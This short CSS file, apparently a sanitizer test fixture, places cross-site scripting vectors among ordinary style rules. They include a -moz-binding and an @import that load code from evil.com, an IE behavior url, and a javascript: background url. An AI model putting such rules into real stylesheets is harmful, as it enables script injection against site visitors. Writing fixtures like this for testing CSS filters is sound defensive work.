.header {
  color: blue;
  font-size: 18px;
}
.exploit {
  -moz-binding: url("http://evil.com/xss.xml#xss");
}
.danger {
  behavior: url(#default#something);
}

@import url("https://evil.com/inject.css");

p {
  margin: 10px;
  padding: 5px;
}
.backdoor {
  background: url(javascript:alert("xss"));
}
